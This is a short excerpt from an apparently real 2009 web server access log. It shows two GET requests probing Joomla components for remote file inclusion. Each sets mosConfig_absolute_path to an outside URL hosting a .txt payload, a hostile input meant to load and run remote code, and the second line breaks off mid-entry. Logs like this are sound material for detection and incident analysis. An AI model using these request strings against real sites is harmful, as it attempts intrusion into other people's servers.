211.48.121.149 - - [18/Oct/2009:05:51:10 -0400] "GET /logs/error_log.Q109082400//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mistresslorisdungeon.com//chat/inc/nyawa.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
72.11.145.8 - - [18/Oct/2009:05:51:10 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1